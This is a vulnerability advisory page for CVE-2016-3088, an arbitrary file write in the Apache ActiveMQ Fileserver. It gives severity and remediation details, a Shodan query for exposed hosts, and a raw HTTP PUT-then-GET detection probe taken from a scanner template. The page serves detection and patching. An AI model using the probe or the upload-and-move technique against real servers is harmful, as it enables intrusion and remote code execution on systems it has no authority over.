🔙 목록으로 돌아가기

CVE-2016-3088: Apache ActiveMQ Fileserver - Arbitrary File Write

TitleApache ActiveMQ Fileserver - Arbitrary File Write
Authorfq_hsu
SeverityCritical
ImpactAn attacker can write arbitrary files on the server, potentially leading to remote code execution.
RemediationUpgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
CVSS Score9.8
EPSS Score0.94294
CVE IDCVE-2016-3088
CWE IDCWE-20
Shodan Querycpe:"cpe:2.3:a:apache:activemq"product:"activemq openwire transport"
Tags cve2016 cve fileupload kev edb apache activemq intrusive vkev vuln

🔍 Vulnerability Description

Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.

🌐 HTTP Request

PUT /fileserver/38FhiO0i9l2afFTBa1qb82ZvgzZ.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 8
Accept-Encoding: gzip

54687697
GET /fileserver/38FhiO0i9l2afFTBa1qb82ZvgzZ.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-3088.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-3088.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A